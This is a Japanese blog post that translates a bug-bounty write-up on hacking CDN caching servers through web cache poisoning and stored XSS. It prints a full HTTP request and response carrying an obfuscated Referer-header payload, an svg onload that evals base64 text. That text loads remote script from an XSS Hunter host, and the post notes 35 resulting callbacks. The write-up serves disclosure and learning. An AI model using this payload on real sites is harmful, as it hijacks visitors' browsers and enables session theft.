Shikata Ga Nai

Private? There is no such things.

How I Made $16,500 Hacking CDN Caching Servers — Part 1を訳してみた

Hello there, ('ω')ノ

 

CDNキャッシングサーバの作成方法を。

 

脆弱性:

 Webキャッシュポイズニング

 保存されたXSS

 Webキャッシュの欺瞞

 

記事:

 https://infosecwriteups.com/how-i-made-15-000-by-hacking-caching-servers-part-1-5541712a61c3

 

保存されたXSSへのキャッシュポイズニング:

最初はキャッシュ詐欺の問題として報告して。

当時、キャッシュエクスプロイトについて知っていたのはそれだけであり。

これがトリアージされてキャッシュポイズニングとして保存された理由で。

次にSelf-XSSを探すことで高またはクリティカルとしてトリアージすることができて。

 

リファラーヘッダを介してJavascriptを挿入することはできましたが。

攻撃者がURLを変更する必要があるため。

攻撃者は、Poisoned URLを被害者に送信する必要があり。

キャッシュサーバがそれを保存できて。

 

Google Dorkingを行った後。

拡張子なしで直接キャッシュされているURLを見つけることができたので。

すぐにレポートを更新することに。

XSS Hunterペイロードを「キャッシュバスター」(?param=123)なしで保存し。

キャッシュサーバが更新されてリクエストが送信されるまで時間を計ることで。

さらに大きな影響を与えて。

 

 https://xsshunter.com/

 

リクエスト:

GET /xxxx/xxxx/xxx HTTP/2
Host: Redacted
Referer: ?</script><svg/onload=eval/**/(atob/**/(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vNTkzLnhzcy5odCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs=>
...

 

応答:

HTTP/2 200 Ok...
Content-Type: text/html; charset=utf-8
X-Cache: HIT
...<html>...<script>..."Referer":"?</script>
<svg/onload=eval/**/(atob/**/(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vNTkzLnhzcy5odCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs=>...

 

XSSHunterからの35件の通知で、そのうち4件が別のサブドメインで発生して。

 

 

Best regards, (^^ゞ